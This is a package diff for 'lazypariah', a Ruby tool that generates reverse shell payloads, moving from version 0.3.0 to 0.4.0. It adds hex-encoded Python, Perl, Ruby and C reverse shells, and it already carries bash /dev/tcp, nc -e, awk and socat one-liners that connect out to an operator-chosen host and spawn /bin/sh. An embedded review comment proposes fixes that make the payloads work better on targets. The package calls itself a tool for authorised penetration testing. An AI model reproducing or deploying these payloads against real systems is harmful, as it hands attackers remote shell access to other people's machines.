lazypariah 0.3.0 → 0.4.0

Files changed (3) hide show
  1. checksums.yaml +4 -4
  2. data/bin/lazypariah +45 -7
  3. metadata +2 -2
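--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz: ce53f8f317c07ff9692f984dcf1b4854ef9775f0cd10d62cbb010dd0d5a8f8a9
-data.tar.gz: 513ac2a8a3a6eef6548c5a7d515c5c5a55b63550ddbd432c49516a346f719984
+metadata.gz: a3aee611f4d7a3d19d4c7816eee540e7a2d0e04523e565719158e78fe365a026
+data.tar.gz: 7f63871c91c193144da7182a32eabd9c401561deb8fbf1c6678ceb953a8d9a37
 SHA512:
-metadata.gz: b2a86bb13615232d2cc9610728084e466ec70f9bb91c972c0f557990efde7cebbaead6b47906d088facffc2e2d35755dbc7ff93482ee93c06c51666b1b641a8f
-data.tar.gz: 94da5b8370ffff1708d1c1e8c0b973f71d07d4c014592d5267f66fa61182a85fcf981e1928f63dc0241e5c54ea204bad29a5d0fa6fa7d3b23c665f1be0deb532
+metadata.gz: f049e7ff4764242aab6cee06bb8b9e314061d751241260e66045465e4dd38c926fe483886b7513c684d0ee9b26c8bb12d039f5f6ab8831b313856f7d431beb91
+data.tar.gz: 48c488ee7a6776f336d7e806bcb914645ab04cc56cc0adda1c9aaeec70999b0f2b94ed30f7818c4e67d74bb5638b113889e3c938bd45d80c91932ddfb89a1a93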
@@ -1,7 +1,7 @@
1
1
  #!/usr/bin/env ruby
2
2
  #
3
3
  # Title: LAZYPARIAH
4
- # Version: 0.3.0
4
+ # Version: 0.4.0
5
5
  # Description:
6
6
  # LAZYPARIAH is a simple tool for generating various reverse shell payloads
7
7
  # on the fly. It is intended to be used only in authorised circumstances by
@@ -29,7 +29,7 @@ require "stringio"
29
29
 
30
30
  # Define constants.
31
31
  PROGRAM_NAME = "LAZYPARIAH".freeze()
32
- PROGRAM_VERSION = "0.3.0".freeze()
32
+ PROGRAM_VERSION = "0.4.0".freeze()
33
33
  EXECUTABLE_NAME = "lazypariah".freeze()
34
34
 
35
35
  # Define payload list.
@@ -41,6 +41,9 @@ PAYLOAD_LIST = [
41
41
  "python3_b64",
42
42
  "python2_b64",
43
43
  "python_b64",
44
+ "python3_hex",
45
+ "python2_hex",
46
+ "python_hex",
44
47
  "nc",
45
48
  "nc_pipe",
46
49
  "php_fd_3",
@@ -57,9 +60,12 @@ PAYLOAD_LIST = [
57
60
  "php_fd_6_tags",
58
61
  "perl",
59
62
  "perl_c",
63
+ "perl_b64",
64
+ "perl_hex",
60
65
  "ruby",
61
66
  "ruby_c",
62
67
  "ruby_b64",
68
+ "ruby_hex",
63
69
  "bash_tcp",
64
70
  "awk",
65
71
  "socat",
@@ -68,8 +74,10 @@ PAYLOAD_LIST = [
68
74
  "java_class_gzip_b64",
69
75
  "c_binary",
70
76
  "c_binary_b64",
77
+ "c_binary_hex",
71
78
  "c_binary_gzip",
72
- "c_binary_gzip_b64"
79
+ "c_binary_gzip_b64",
80
+ "c_binary_gzip_hex"
73
81
  ].sort()
74
82
 
75
83
  # Define function for displaying program information.
@@ -166,12 +174,21 @@ begin
166
174
  when "python3_b64"
167
175
  code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
168
176
  print_output("echo #{code} | base64 -d | python3", url_encode=url_encode)
177
+ when "python3_hex"
178
+ code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
179
+ print_output("echo #{code} | xxd -p -r - | python3", url_encode=url_encode)
169
180
  when "python2_b64"
170
181
  code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
171
182
  print_output("echo #{code} | base64 -d | python2", url_encode=url_encode)
183
+ when "python2_hex"
184
+ code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
185
+ print_output("echo #{code} | xxd -p -r - | python2", url_encode=url_encode)
172
186
  when "python_b64"
173
187
  code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
174
188
  print_output("echo #{code} | base64 -d | python", url_encode=url_encode)
189
+ when "python_hex"
190
+ code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
191
+ print_output("echo #{code} | xxd -p -r - | python", url_encode=url_encode)
175
192
  when "nc"
176
193
  print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
177
194
  when "nc_pipe"
@@ -204,6 +221,12 @@ begin
204
221
  print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
205
222
  when "perl_c"
206
223
  print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
224
+ when "perl_b64"
225
+ code = Base64.strict_encode64("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};")
226
+ print_output("echo #{code} | base64 -d | perl", url_encode=url_encode)
227
+ when "perl_hex"
228
+ code = "use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};".unpack("H*")[0]
229
+ print_output("echo #{code} | xxd -p -r - | perl", url_encode=url_encode)
207
230
  when "ruby"
208
231
  print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
209
232
  when "ruby_c"
@@ -211,12 +234,15 @@ begin
211
234
  when "ruby_b64"
212
235
  code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
213
236
  print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
237
+ when "ruby_hex"
238
+ code = "require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end".unpack("H*")[0]
239
+ print_output("echo #{code} | xxd -p -r - | ruby", url_encode=url_encode)
214
240
  when "bash_tcp"
215
241
  print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
216
242
  when "awk"
217
243
  print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
218
244
  when "socat"
219
- print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh")
245
+ print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode=url_encode)
220
246
  when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
221
247
  code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
222
248
 
@@ -246,7 +272,7 @@ begin
246
272
  end
247
273
 
248
274
  system("rm -r #{temp_dir}")
249
- when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64"
275
+ when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64", "c_binary_hex", "c_binary_gzip_hex"
250
276
  code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
251
277
 
252
278
  temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
@@ -261,7 +287,10 @@ begin
261
287
  print_output(binary_payload)
262
288
  when "c_binary_b64"
263
289
  binary_payload_b64 = Base64.strict_encode64(binary_payload)
264
- print_output(binary_payload_b64)
290
+ print_output(binary_payload_b64, url_encode=url_encode)
291
+ when "c_binary_hex"
292
+ binary_payload_hex = binary_payload.unpack("H*")[0]
293
+ print_output(binary_payload_hex)
265
294
  when "c_binary_gzip"
266
295
  sio = StringIO.new()
267
296
  sio.binmode()
@@ -269,7 +298,7 @@ begin
269
298
  gz.write(binary_payload)
270
299
  gz.close()
271
300
  binary_payload_gzip = sio.string
272
- print_output(binary_payload_gzip, url_encode)
301
+ print_output(binary_payload_gzip)
273
302
  when "c_binary_gzip_b64"
274
303
  sio = StringIO.new()
275
304
  sio.binmode()
@@ -279,6 +308,15 @@ begin
279
308
  binary_payload_gzip = sio.string
280
309
  binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
281
310
  print_output(binary_payload_gzip_b64, url_encode=url_encode)
311
+ when "c_binary_gzip_hex"
312
+ sio = StringIO.new()
313
+ sio.binmode()
314
+ gz = Zlib::GzipWriter.new(sio)
315
+ gz.write(binary_payload)
316
+ gz.close()
317
+ binary_payload_gzip = sio.string
318
+ binary_payload_gzip_hex = binary_payload_gzip.unpack("H*")[0]
319
+ print_output(binary_payload_gzip_hex)
282
320
  end
283
321
  end
284
322
 
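Review bot: The two new hex branches in the c_binary hunk drop the URL-encode flag — `print_output(binary_payload_hex)` and `print_output(binary_payload_gzip_hex)` — while the sibling `c_binary_b64`/`c_binary_gzip_b64` branches pass `url_encode=url_encode` (the same hunk even adds it to `c_binary_b64`), so the URL-encoding option is silently ignored for hex output; change them to `print_output(binary_payload_hex, url_encode=url_encode)` and `print_output(binary_payload_gzip_hex, url_encode=url_encode)`. The Python reverse-shell source is now duplicated six times across the `python*_b64`/`python*_hex` branches and the Perl source four times; hoisting each into one frozen constant (e.g. `PYTHON_SHELL_SRC`) built from `ARGV[1]`/`ARGV[2]` and encoding it per branch would keep the b64 and hex variants from drifting apart. The hex variants also depend on `xxd` being present on the target, which usually ships with vim rather than coreutils, so a comment such as `# Requires xxd on the target; the *_b64 variants only need coreutils base64.` above the first `python3_hex` branch would spare the operator a failed attempt. The `begin`/`case` block these hunks sit in starts and ends outside the section.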
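--- a/metadata
+++ b/metadata
@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: lazypariah
 version: !ruby/object:Gem::Version
-version: 0.3.0
+version: 0.4.0
 platform: ruby
 authors:
 - Peter Funnell
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2020-11-23 00:00:00.000000000 Z
+date: 2020-11-24 00:00:00.000000000 Z
 dependencies: []
 description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
 on the fly. It is intended to be used only in authorised circumstances by qualified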